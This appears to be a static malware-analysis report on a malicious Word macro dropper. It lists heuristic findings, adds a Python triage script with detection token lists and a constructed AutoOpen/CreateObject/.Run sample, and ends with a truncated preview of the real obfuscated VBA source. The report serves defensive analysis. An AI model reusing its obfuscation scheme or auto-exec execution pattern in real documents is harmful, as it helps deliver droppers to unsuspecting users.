Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cd9378a35f3da7ad…

MALICIOUS

Office (OLE)

Size: 212.0 KB
Created: 2018-03-06 14:36:00
Authoring application: Microsoft Office Word
First seen: 2018-11-20
MD5: 740b14344cf8d162e9765693d4d2d464
SHA-1: ad323b240ce128b3af68e42b64b4aa47c1d5005b
SHA-256: cd9378a35f3da7adc5976215b1171fc9bfafb7961e7b8fe5da980986d679454a
Risk Score: 224

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a malicious Word (OLE) document carrying a VBA macro. The macro runs automatically through an AutoOpen procedure and calls CreateObject, the usual first step for standing up a WScript.Shell, XMLHTTP or similar COM object to fetch and run a second-stage payload. The extracted source (macros.bas, below) is heavily obfuscated: string literals are passed through a decoding routine and interleaved with junk arithmetic on uninitialised variables, so the object ProgID and any payload URL are assembled at runtime rather than appearing as literals, and no download URL was recovered statically (the only URL found is an Office schema namespace). ClamAV's Doc.Dropper.Agent detection corroborates the dropper assessment; note that the summary as generated cited Doc.Dropper.Agent-6480315-0 while the heuristic list below records Doc.Dropper.Agent-6465338-0, so the family name agrees but the signature ID should be reconciled against the raw scanner output.

Heuristics (8)

  • ClamAV: Doc.Dropper.Agent-6465338-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6465338-0. The signature matched the OLE container; the decoded macro source extracted below was not flagged on its own.
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    The VBA project defines an AutoOpen procedure, which Word runs automatically when the document is opened with macros enabled, so no user action beyond enabling content is required.
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    The macro calls CreateObject, which instantiates a COM object by ProgID at runtime (in downloaders typically WScript.Shell, MSXML2.XMLHTTP or ADODB.Stream). The portion of the preview reproduced below does not reach the call, and the argument is expected to be assembled at runtime by the dd333h3sd string-decoding routine visible there rather than stored as a literal.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This check catches documents whose macro source has been stripped (p-code only) or fails to extract, where visible source is unavailable; here it confirms from the compiled stream what the decoded source also shows.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, with no modern VBA project recovered and no stronger macro-virus family marker present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this report did recover a VBA project (macros.bas below), so the finding overlaps with OLE_VBA_AUTOOPEN and adds no independent evidence for this sample.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms. For this sample the match is the obfuscated macros.bas listed below.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label states which channel (macro, JS, link annotation, document body, ...) reached it.
    URL http://schemas.openxmlformats.org/drawingml/2006/main  In document text (OLE body). This is the DrawingML XML namespace identifier that Office drawing parts reference; it is not a network indicator and should not be treated as C2 or blocked.
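The Python script below is an added example, not code from the analysis pipeline or from the sample. It re-implements, with the standard library only, the token checks behind the heuristics above (auto-exec procedure names, CreateObject and other execution tokens, and the auto-exec plus execution-token pairing that OLE_VBA_PCODE_AUTOEXEC_EXEC applies to the compiled stream, applied here to decoded source) together with the long-string count used for the extracted artifact, and it strips the junk-arithmetic padding that fills the macros.bas preview so the surviving statements can be read. The embedded sample macro is constructed: its string literals and junk lines copy the shape of the preview, while the CreateObject / .Run tail is assumed for illustration and is not shown in the report. The 20-character blob threshold, the token lists and the JUNK_ARITHMETIC_PADDING label are the example's own choices.

```python
"""Static triage of decoded VBA source, mirroring this report's heuristic classes.

Added example (not the pipeline's code). Standard library only, so it runs on
the text that olevba extracts without any further dependencies.
"""
import re

# Procedure names Office runs without user interaction once macros are enabled.
AUTOEXEC = ("AutoOpen", "AutoExec", "AutoClose", "Auto_Open",
            "Document_Open", "Workbook_Open")
# Tokens that indicate object creation, shell execution or download (example's list).
EXEC_TOKENS = ("CreateObject", "WScript.Shell", "Shell", "URLDownloadToFile",
               "XMLHTTP", "ADODB.Stream", ".Run", ".Exec", "powershell", "cmd.exe")
# Math/conversion functions that make up the junk arithmetic seen in the preview.
JUNK_FUNCS = r"\b(?:Atn|Sqr|Sgn|Sin|Cos|Abs|Int|Fix|CStr|CDate|CLng|CInt|CDbl)"
ASSIGN = re.compile(r"^\s*[A-Za-z_]\w*\s*=\s*(.+)$")
STRING_LIT = re.compile(r'"([^"\n]*)"')
BLOB_MIN_LEN = 20  # example's threshold for a "long blob"

# Constructed sample: literals and junk lines copy the shape of the macros.bas
# preview; the CreateObject/.Run tail is ASSUMED and not shown in the report.
SAMPLE_VBA = '''Attribute VB_Name = "ofpUfbza"
Sub AutoOpen()
On Error Resume Next
GhoTS = "iwTUIiFATDp=%qSNfnEArwdRTiHlKkSEOOiLwMhXWXXVoarEKZGoX"
AUiHwtrI = 8010122 / Atn(XiuwaHzb) / (2719320 - DjPPGnbz / 9069421 - Sqr(kzCipNNN * CStr(nvFUnXQd)))
PiaIzCuhcp = dkclQLYqi + dd333h3sd(GhoTS, 26, 19)
puZlcrj = "zmSkSDv&!%2rav%!=tKwcSmji"
RbUsz = 112562 / Atn(FPVoPoQ) / (566787 - hWkzOWY / 7821740 - CLng(1449442))
ipKHwlaiTq = LPFuNG + dd333h3sd(puZlcrj, 9, 10)
Set obj = CreateObject(PiaIzCuhcp)
obj.Run ipKHwlaiTq, 0
End Sub
'''


def is_junk_arith(line):
    """True for 'x = <numbers, operators and math/conversion calls on
    uninitialised names>'. Under On Error Resume Next these lines raise
    (e.g. division by Atn(Empty) = 0) or yield garbage, and are ignored; they
    exist only to pad the module. Real statements carry string literals or
    call arguments (commas), which this check refuses."""
    m = ASSIGN.match(line)
    if not m:
        return False
    rhs = m.group(1)
    if '"' in rhs or "," in rhs or not re.search(JUNK_FUNCS + r"\s*\(", rhs):
        return False
    bare = re.sub(JUNK_FUNCS + r"\s*\(", "(", rhs)
    return re.fullmatch(r"[\w\s+\-*/^().]+", bare) is not None


def code_lines(source):
    """Statements only: drop blank lines and the 'Attribute ...' module header."""
    return [l for l in source.splitlines()
            if l.strip() and not l.strip().startswith("Attribute ")]


def strip_junk(source):
    """Skeleton of the macro: every statement that is not padding."""
    return [l for l in code_lines(source) if not is_junk_arith(l)]


def triage_vba(source):
    """Collect the facts the report's heuristics key on."""
    lower = source.lower()
    code = code_lines(source)
    junk = [l for l in code if is_junk_arith(l)]
    autoexec = sorted(t for t in AUTOEXEC
                      if re.search(r"\b" + re.escape(t) + r"\b", source, re.I))
    exec_tokens = sorted(t for t in EXEC_TOKENS if t.lower() in lower)
    blobs = [s for s in STRING_LIT.findall(source) if len(s) >= BLOB_MIN_LEN]
    return {
        "autoexec": autoexec,
        "exec_tokens": exec_tokens,
        "autoexec_with_exec": bool(autoexec and exec_tokens),
        "code_lines": len(code),
        "junk_lines": len(junk),
        "junk_ratio": round(len(junk) / len(code), 2) if code else 0.0,
        "long_blobs": len(blobs),
        "on_error_resume_next": "on error resume next" in lower,
    }


def fired_heuristics(r):
    """Map triage results onto the report's heuristic codes. The PCODE code is
    fired by the report on the compiled stream; here the same token pairing is
    applied to source. JUNK_ARITHMETIC_PADDING is this example's own label."""
    codes = []
    if r["code_lines"]:
        codes.append("OLE_VBA_MACROS")
    if r["autoexec"]:
        codes.append("OLE_VBA_AUTOOPEN")
    if "CreateObject" in r["exec_tokens"]:
        codes.append("OLE_VBA_CREATEOBJ")
    if r["autoexec_with_exec"]:
        codes.append("OLE_VBA_PCODE_AUTOEXEC_EXEC")
    if r["long_blobs"]:
        codes.append("EXTRACTED_FILE_STATIC_TRIAGE")
    if r["junk_lines"] and r["on_error_resume_next"]:
        codes.append("JUNK_ARITHMETIC_PADDING")
    return codes


if __name__ == "__main__":
    result = triage_vba(SAMPLE_VBA)
    for k, v in result.items():
        print(f"{k}: {v}")
    print("fired:", fired_heuristics(result))
    print("skeleton:")
    for stmt in strip_junk(SAMPLE_VBA):
        print("  ", stmt)
```

For a real sample, replace SAMPLE_VBA with the text olevba extracts (the macros.bas artifact in this report) and read the skeleton first: in the preview every real statement is a literal assignment followed by `dd333h3sd(<literal>, n, m)`, so the skeleton is the list of decoder calls in order, which is what you hand to a debugger or an emulator to recover the ProgID and URL.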

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 63002 bytes
SHA-256: 392aa16edcedab20b564430c2e6a271c64c1d19f15aa5a9e6b7e2fa1e0c4c25a
Detection: ClamAV: No threats found (the Doc.Dropper.Agent signature above fired on the OLE container, not on the decoded source, so the macro text has no signature coverage of its own)
Obfuscation or payload: likely. The carved artifact contains 25 long base64-like blobs. The literals visible in the preview are not valid base64 (they contain %, & and !), so the count reflects a string-length heuristic rather than directly decodable payloads; each literal is instead passed through dd333h3sd(<string>, n, m) and concatenated into a variable, between runs of arithmetic on uninitialised variables that would raise runtime errors (division by Atn of an uninitialised variable, which is 0) were it not for On Error Resume Next.
Preview script (first 1,000 lines of the extracted script; truncated below)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "ofpUfbza"
Function oZIWczOIklGA()
On Error Resume Next
GhoTS = "iwTUIiFATDp=%qSNfnEArwdRTiHlKkSEOOiLwMhXWXXVoarEKZGoX"
AUiHwtrI = 8010122 / Atn(XiuwaHzb) / (2719320 - DjPPGnbz / 9069421 - Sqr(kzCipNNN * CStr(nvFUnXQd / Sgn(9270891 - CDate(412284 / WfzTAjhpjdKvsV * 5989874 * Sqr(cPINulLaX))))) + (PcspJiwwzFzidG - 6232713 / 4646561 / CLng(6383490)))
TbfiJVkYN = 7445966 / Atn(AMzHzoOnoC) / (7133690 - XvCUEwqT / 6018337 - Sqr(uXaZtlBjWEYwXl * CStr(UvBvrHvM / Sgn(7173114 - CDate(5435795 / ambbqSwBRbhY * 8950619 * Sqr(lIjjubYREk))))) + (oYoqz - 2241033 / 7836504 / CLng(9469916)))
PiaIzCuhcp = dkclQLYqi + dd333h3sd(GhoTS, 26, 19)
puZlcrj = "zmSkSDv&!%2rav%!=tKwcSmji"
pwvHTnlSWEZ = 9580646 / Atn(EhODzuGSwYjrP) / (3987424 - qVLpSowRW / 7484085 - Sqr(ILFYhRMapPGmc * CStr(cRwFQXZUvQ / Sgn(1449091 - CDate(5874880 / fDFQs * 3097487 * Sqr(luNYr))))) + (ipfGkji - 2778543 / 8078755 / CLng(4514046)))
RbUsz = 112562 / Atn(FPVoPoQ) / (566787 - hWkzOWY / 7821740 - Sqr(DaOBsjopjYv * CStr(pfEEmAizfYHoC / Sgn(9589740 - CDate(3561209 / HVMKZITazEWmza * 1566703 * Sqr(HWrrfubVpqCfS))))) + (zuRthKLlQj - 2305040 / 5769770 / CLng(1449442)))
ipKHwlaiTq = LPFuNG + dd333h3sd(puZlcrj, 9, 10)
ztZkwqLJt = "tdnjinBLWhq%8rav% tes&&re=%jVcoqvzKYirAXHjdZo"
tPcHStBLvt = 7251070 / Atn(WhvstQtQUnqRzR) / (1411369 - OwRmmUGzLohXi / 1957642 - Sqr(rXdivpu * CStr(KfPsRiSJOuZa / Sgn(3895646 - CDate(6388536 / JBbvjFiWiKcwtU * 6780184 * Sqr(BTLHHWb))))) + (RsiTdIjrKYTj - 3859271 / 8943390 / CLng(2703815)))
GVUHuj = 6140323 / Atn(JhipjZpijX) / (1376970 - ZsnZnd / 7718065 - Sqr(PtZaknVACr * CStr(Ffjzot / Sgn(9837091 - CDate(6422628 / potlcikf * 6233354 * Sqr(jQZEMQ))))) + (HEwEoc - 8429417 / 3122722 / CLng(295462)))
qWkcFPS = iwwEQOhfGbP + dd333h3sd(ztZkwqLJt, 19, 16)
UiHWvRrma = "VVnNbAkisIJsHPSnOrQSb&&p=%1rav% teiwKRf"
ZFnwab = 4662305 / Atn(BkDhKiLP) / (518577 - wswGRASEFicXTz / 8948481 - Sqr(XpSNaZJzKsp * CStr(qzTFsJE / Sgn(4842158 - CDate(5417865 / Nwqvbq * 8250192 * Sqr(RFmiKWwpUW))))) + (zvZLHOHOXiJ - 8808633 / 4106329 / CLng(670478)))
aQCfcmG = 2880142 / Atn(TXfwTGhajY) / (2256069 - zIDphqcMnnij / 3821293 - Sqr(TzHLRbvucR * CStr(YPtOwbiCUROa / Sgn(3981175 - CDate(2350869 / aCnjowirmi * 3698965 * Sqr(HkrCjmAJb))))) + (zpMAizKFYmz - 7391066 / 132749 / CLng(8684717)))
bEOYLN = tuwjowUlaz + dd333h3sd(UiHWvRrma, 6, 13)
iTfVSM = "ELrQjOBBHhthnsWhDliBKrMtNJiWntffFhbEoLCcqSQQF% tes&&!%1Wm"
fhzsL = 7521805 / Atn(ToAODt) / (1964174 - TiscZDIIjw / 117544 - Sqr(RaNGDQwl * CStr(UIUjq / Sgn(2286975 - CDate(4000964 / kKtifvdQKjWE * 3772703 * Sqr(dJTqt))))) + (tLmzYczWXv - 6883381 / 8480678 / CLng(7702190)))
zrCGwiFKz = 3973251 / Atn(mGolikpthajiRf) / (2069493 - zStuYXw / 1198118 - Sqr(wHsOz * CStr(QwCqCfEOqD / Sgn(3559867 - CDate(1002418 / rthrNjjZu * 5046703 * Sqr(OJiiidziiw))))) + (jPoHjvDD - 8248380 / 1223441 / CLng(3507821)))
zpBvz = wdpuXG + dd333h3sd(iTfVSM, 3, 18)
pBtFNZSzGMI = "HsblaChfYihq=%DwGiCvEMcufUfnRPrFQj"
zdomDWzR = 1216031 / Atn(KsviqRDzSW) / (7031521 - LkjqFd / 4938585 - Sqr(XrzzPNZVdwJkMo * CStr(HCWLRiaDiGOj / Sgn(4731468 - CDate(6390834 / ZDjKDSuzPc * 8604509 * Sqr(VTMAwXwYnjS))))) + (RzoSrB - 6391015 / 97736 / CLng(7726557)))
LAzkI = 9769244 / Atn(GEBkVMFHi) / (4803764 - EjSGSIcIrqlYtG / 5827457 - Sqr(GNvstXvGwu * CStr(aMibjiUtFAli / Sgn(4695465 - CDate(4670464 / HiUjIirkwtm * 6296983 * Sqr(joLJX))))) + (BvIPBpZMZ - 5208729 / 4028534 / CLng(5969849)))
PnkwIi = OJPPfiPEWY + dd333h3sd(pBtFNZSzGMI, 17, 15)
lOwjZw = "BKOtrhRVtzcocqEOzbI"
fhADVu = 272900 / Atn(OWzfERXL) / (8619225 - rNqIDVcYHvW / 4585158 - Sqr(ZQuIGNtSFOHX * CStr(GvNszYCOYwJZE / Sgn(9886977 - CDate(912431 / sGwqjXOJJRwzNl * 9662920 * Sqr(kLOjLOvzVYB))))) + (liBNoUNI - 2238902 / 6260837 / CLng(1491316)))
VfNmnzYbP = 6648771 / Atn(DjiZDBmAaos) / (7042944 - ldKwVLWvY / 
... (truncated)